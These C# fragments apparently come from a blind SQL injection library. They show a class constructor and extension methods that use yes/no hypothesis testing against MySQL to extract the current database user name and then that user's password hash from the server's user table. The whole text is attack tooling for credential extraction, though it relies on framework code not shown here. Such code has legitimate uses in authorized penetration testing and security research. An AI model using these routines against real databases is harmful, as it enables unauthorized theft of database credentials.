public BlindSqlInjection( ILogger <BlindSqlInjection> logger, IHypothesisTester hypothesisTester ) { Logger = logger; HypothesisTester = hypothesisTester; Context = new MySqlInjectionContext(this); }
public static async Task <string> GetDatabasePasswordAsync(this MySqlInjectionContext context) { var user = await context.GetDatabaseUserNameAsync(); return(await context.MySql.Users.Where(u => u.Name == user).Select(u => u.AuthenticationString).FirstAsync(estimatedLength: 40)); }
public static Task <string> GetDatabaseUserNameAsync(this MySqlInjectionContext context, int estimatedLength = 32) => context.Dual.Select(_ => User()).FirstAsync(estimatedLength);